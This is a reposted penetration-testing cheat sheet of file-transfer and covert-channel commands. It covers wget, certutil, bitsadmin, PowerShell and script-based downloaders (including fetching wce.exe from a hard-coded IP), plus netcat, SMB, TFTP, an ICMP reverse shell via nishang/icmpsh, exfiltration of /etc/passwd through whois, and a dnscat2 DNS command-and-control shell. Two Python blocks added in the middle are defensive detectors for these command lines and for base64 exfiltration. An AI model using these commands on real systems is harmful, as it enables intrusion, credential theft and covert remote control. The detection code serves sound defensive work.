File transfer

Common file transfer methods

Reposted from: 0d4y

wput

wput dir_name ftp://linuxpig:123456@host.com/

wget

wget http://site.com/1.rar -O 1.rar

aria2c

Needs to be installed first

aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2

powershell

$p = New-Object System.Net.WebClient
# %homepath% is a cmd.exe variable and is not expanded by PowerShell; use $env: instead
$p.DownloadFile("http://domain/file", "$env:HOMEDRIVE$env:HOMEPATH\file")

VBS script

Set post = CreateObject("Msxml2.XMLHTTP")
' synchronous request (False), so responseBody is complete when Send returns
post.Open "GET", "http://111.230.170.95/passwd", False
' send the request
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3   ' adModeReadWrite
aGet.Type = 1   ' adTypeBinary
aGet.Open()
' wait 3 seconds for the download to finish (only needed with an asynchronous request)
'wscript.sleep 3000
' write the data
aGet.Write(post.responseBody)
aGet.SaveToFile "passwd", 2   ' adSaveCreateOverWrite
aGet.Close

Run: cscript test.vbs

perl

#!/usr/bin/perl
use LWP::Simple;
# getstore fetches the URL and writes the body straight to the local file
getstore("http://domain/file", "file");

Run: perl test.pl

python

#!/usr/bin/python
try:
    from urllib2 import urlopen          # Python 2
except ImportError:
    from urllib.request import urlopen   # Python 3
u = urlopen('http://192.168.20.149/ds.exe')
localFile = open('local_file', 'wb')     # binary mode so .exe bytes are not mangled on Windows
localFile.write(u.read())
localFile.close()

Run: python test.py

ruby

#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
  r = http.get("/file")
  File.open("save_location", "wb") { |file|   # binary mode, so the body is written byte for byte
    file.write(r.body)
  }
}

Run: ruby test.rb

php

#!/usr/bin/php
<?php
// file() returns an array of lines and writing only $data[0] kept just the first line;
// file_get_contents() returns the whole body as one string
$data = @file_get_contents("http://111.230.170.95/passwd");
$lf = "passwd";
$fh = fopen($lf, 'w');
fwrite($fh, $data);
fclose($fh);
?>

Run: php test.php

NC

  • attacker

    cat file | nc -l 1234
  • target

    nc host_ip 1234 > file

FTP

ftp 127.0.0.1
username
password
get file
exit

TFTP

tftp -i host GET location_of_file_on_tftp_server C:%homepath%\file

Bitsadmin

bitsadmin /transfer n http://domain/file c:%homepath%\file
bitsadmin /transfer down /download /priority normal "http://111.230.170.95/wce.exe" D:\wce.exe

Windows file share

net use x: \\127.0.0.1\share /user:example.com\userID myPassword
net use u: \\192.168.20.201\gong
administrator
Hello123

(The second form prompts for the user name and password; the two lines that follow it are the answers typed at those prompts.)

SCP

  • Local to remote

    scp file user@host.com:/tmp
  • Remote to local

    scp user@host.com:/tmp/file file

rsync

  • Copy files from a remote rsync server to the local machine

    rsync -av root@192.168.78.192::www /databack
  • Copy files from the local machine to a remote rsync server

    rsync -av /databack root@192.168.78.192::www

certutil.exe

certutil.exe -urlcache -split -f http://site.com/file
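Every Windows command in this section (bitsadmin, tftp, net use, certutil and the PowerShell WebClient one-liner) shows up verbatim in process-creation telemetry, which is where a defender catches them. The following Python is an added example written for this page, not code from the original author: it runs a handful of command-line rules over constructed Sysmon/4688-style process records (hosts, paths and command lines are made up for the sample) and reports which rule fired and which URL was fetched, while leaving a benign certutil -verify alone.

```python
import re

# Constructed process-creation records in the shape of Sysmon event 1 / Security 4688
# (hypothetical sample data for this example, not taken from any real host).
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://site.com/file"},
    {"host": "ws01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer n http://domain/file c:\Users\bob\file"},
    {"host": "ws02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -exec bypass \"(New-Object System.Net.WebClient).DownloadFile('http://domain/file','file')\""},
    {"host": "ws02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -verify signed.cab"},                      # benign certutil use
    {"host": "srv01", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use x: \\127.0.0.1\share /user:example.com\userID myPassword"},
    {"host": "srv01", "image": r"C:\Windows\System32\tftp.exe",
     "cmdline": r"tftp -i 10.0.0.5 GET tools.zip C:\Users\bob\tools.zip"},
    {"host": "srv01", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

# Each rule: (name, compiled regex over the command line). Case-insensitive because
# cmd.exe and PowerShell accept any casing of both the binary name and its switches.
RULES = [
    ("certutil_urlcache",    re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("bitsadmin_transfer",   re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer", re.I)),
    ("powershell_download",  re.compile(r"\bpowershell(\.exe)?\b.*(Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest)", re.I)),
    ("tftp_binary_transfer", re.compile(r"\btftp(\.exe)?\b.*\s-i\s", re.I)),
    ("net_use_cleartext_pw", re.compile(r"\bnet(\.exe)?\s+use\b.*/user:\S+\s+\S+", re.I)),
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)


def matching_rules(cmdline):
    """Return the names of every rule whose pattern matches this command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events):
    """Run the rules over process records; one finding per event that matched at least one rule."""
    findings = []
    for ev in events:
        hits = matching_rules(ev["cmdline"])
        if not hits:
            continue
        findings.append({
            "host": ev["host"],
            "image": ev["image"],
            "rules": hits,
            "urls": URL_RE.findall(ev["cmdline"]),   # the remote source, useful for blocking and pivoting
            "cmdline": ev["cmdline"],
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["host"], ",".join(f["rules"]), f["urls"] or "-", "::", f["cmdline"])
```

The rules are deliberately narrow (a switch plus the binary name) so that ordinary certutil or net use activity does not fire; in production the same patterns are usually expressed as Sigma or SIEM queries over the CommandLine field, and the extracted URL is what gets pushed to the proxy block list.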

Reverse shell over ICMP

Tools: nishang, icmpsh

  1. Tell the kernel to ignore ICMP echo requests (so icmpsh answers them instead)

    sysctl -w net.ipv4.icmp_echo_ignore_all=1
  2. Start the ICMP listener

    python icmpsh_m.py 192.168.158.133 192.168.158.128
  3. Change into the nishang\Shells directory

  • Load and run from PowerShell

    Import-Module .\Invoke-PowerShellIcmp.ps1
    Invoke-PowerShellIcmp 192.168.158.133
  • Load and run PowerShell from cmd

    powershell.exe -exec bypass "import-module .\Invoke-PowerShellIcmp.ps1;Invoke-PowerShellIcmp 192.168.158.133"

Transfer over whois

# Sending host: base64-encode (no spaces, so the data cannot be misparsed)
whois -h 192.168.x.x -p 4444 `cat /etc/passwd | base64`

# Receiving host: base64-decode
nc -lvvp 4444 | sed "s/ //g" | base64 -d
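The whois trick works because the file rides along as an ordinary command-line argument, which also means it is recorded in full by auditd EXECVE records and shell history. The following Python is an added example written for this page, not code from the original author: it pulls base64-shaped arguments out of constructed command lines, re-joins blobs that the shell split at base64's 76-column line wraps (the reason the receiver above strips spaces), decodes them and reports what kind of file came out. The passwd content, the command lines and the file signatures are made up for the sample.

```python
import base64
import binascii
import re
import shlex
import textwrap

# Constructed sample: the content that would travel through the whois channel above.
# Made up for this example; not real data from any host.
PASSWD_SAMPLE = (b"root:x:0:0:root:/root:/bin/bash\n"
                 b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")

# `base64` wraps its output at 76 columns; in a backtick substitution each wrapped line
# becomes a separate argument. Reproduce that shape so the detector has to cope with it.
_WRAPPED = " ".join(textwrap.wrap(base64.b64encode(PASSWD_SAMPLE).decode(), 76))

# Constructed command lines in the shape of auditd EXECVE / shell-history records.
SAMPLE_CMDS = [
    "whois -h 192.168.1.10 -p 4444 " + _WRAPPED,                               # exfil as on this page
    "whois -h whois.iana.org example.com",                                      # ordinary whois lookup
    "curl -H 'Authorization: Basic dXNlcjpwYXNz' https://api.example.com/",    # short blob, ignored
    "git log 0000000000000000000000000000000000000000",                         # 40 hex chars: base64-shaped, not text
]

B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
MIN_TOKEN = 16     # a run of shorter tokens is not worth decoding
MIN_BLOB = 40      # about 30 decoded bytes; shorter blobs are usually tokens or hashes

# Markers that identify what kind of file was decoded; extend as needed.
SIGNATURES = [
    (b"root:x:0:0", "passwd-like"),
    (b"-----BEGIN", "PEM key or certificate"),
    (b"MZ", "PE executable"),
    (b"\x7fELF", "ELF executable"),
]


def candidate_blobs(cmdline):
    """Yield base64-shaped argument runs, re-joining blobs the shell split on line wraps."""
    run = []
    for tok in shlex.split(cmdline) + [""]:        # the empty sentinel flushes the last run
        if len(tok) >= MIN_TOKEN and B64_TOKEN.match(tok):
            run.append(tok)
            continue
        joined = "".join(run)
        if len(joined) >= MIN_BLOB:
            yield joined
        run = []


def mostly_text(data, threshold=0.9):
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data) >= threshold


def classify(data):
    for magic, kind in SIGNATURES:
        if data.startswith(magic):
            return kind
    return "text" if mostly_text(data) else None   # None: random-looking bytes, probably a hash or token


def scan_commands(cmds):
    """Decode every base64-shaped blob in the command lines and report the recognisable ones."""
    findings = []
    for cmd in cmds:
        for blob in candidate_blobs(cmd):
            try:
                data = base64.b64decode(blob, validate=True)
            except (binascii.Error, ValueError):
                continue
            kind = classify(data)
            if kind is None:
                continue
            findings.append({"program": shlex.split(cmd)[0], "kind": kind,
                             "decoded_bytes": len(data), "preview": data[:40]})
    return findings


if __name__ == "__main__":
    for f in scan_commands(SAMPLE_CMDS):
        print(f["program"], f["kind"], f["decoded_bytes"], f["preview"])
```

The null commit id in the last sample command is a real edge case worth keeping in the test set: it passes the base64 character and length checks but decodes to bytes that are only two-thirds printable, so it is dropped by the text threshold rather than raised as a false positive.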

DNS transfer

  1. Server side (internet-facing host)

    git clone https://github.com/iagox86/dnscat2.git
    cd dnscat2/server
    gem install bundler
    bundle install
    # the same --secret is given to the clients below
    ruby ./dnscat2.rb --secret=32fjafja[fjoas

    # Requires a Ruby environment; if Ruby cannot be installed, try:
    apt install ruby-dev
  2. Kali client side

    git clone https://github.com/iagox86/dnscat2.git
    cd dnscat2/client
    make
    ./dnscat --dns server=x.x.x.x,port=53 --secret=32fjafja[fjoas
  3. Windows client side
    Download the dnscat2 client executable

    https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-win32.zip
    dnscat2-v0.07-client-win32.exe --dns server=x.x.x.x --secret=32fjafja[fjoas
  4. Controlling the shell from the server side

    dnscat2>
    help
    windows
    window -i 1
    shell
    session -i 2
    whoami
